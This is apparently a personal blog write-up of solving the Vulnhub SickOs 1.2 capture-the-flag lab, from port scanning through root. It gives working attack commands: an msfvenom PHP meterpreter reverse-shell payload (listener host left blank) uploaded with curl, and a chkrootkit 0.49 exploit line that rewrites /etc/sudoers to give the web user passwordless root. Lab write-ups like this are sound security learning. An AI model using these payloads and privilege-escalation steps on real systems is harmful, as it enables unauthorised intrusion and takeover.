Another day another  CTF (capture the flag) if you got no projects better sharpen your skill playing CTF :p , this time it’s called SickOs:1.2  from Vulnhub

1. Service Discovery

We started  off using nmap to scan all tcp ports


Two TCP Ports open 22 and 80 and  nothing interesting on SSH, Usually, I proceed to scan  UDP, but I just to lazy, i wanted to see how fast i can Finnish this .

2. Enumeration

Nothing interesting on port 22, lets jump up to see what is on port 80

2.2. Port 80 HTTP

Let’s take a look on pot 80, we start with using Nikto


Nothing special here, let’s see from the web browser


All I see is the dude from matrix, alright, I thought so too Neo, next we’ll fire up the Dirbuster


I can see that there is a directory called test, lets enumerate further


Very nice, look like i can upload files to this directory,  i’ll upload a Msfvenom file, using this command :

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > tai.php

Next, upload the file tai.php using curl (I love curl)

curl --upload-file tai.php -0 --http1.0

and the file is successfully uploaded


Do not pay attention to the other files, those are my experiments, it took me awhile to figure out that the reverse shell only work on port 443 😀

3. Exploitation

Next step is to setup a Multi/Handler Listener on metaslpoit, and click on the file


We have meterpreter, we drop down into shell, but unfortunately we only have shell with limited privilege, we need to escalate our privilege to root, lets just enumerate further from here.


We can see that the target machine is using Linux Ubuntu on 3.11 kernel, and some fancy banner, as usual at this point I upload and run  the linuxprivchecker.pycomplete result can be seen here

After spent hours  of searching for vulnerability and some enumeration I found that the target machine is running chkrootkit version 0.49 which is vulnerable. After checking the scheduled corn job I can see that it run daily, next step, I run this command :


echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

After several minutes i ran sudo su, for root privilege


and capture the flag which is located in /root directory



4. Conclusion

Nice  VM, I learnt some new techniques. Thanks D4rk36 and Vulnhub!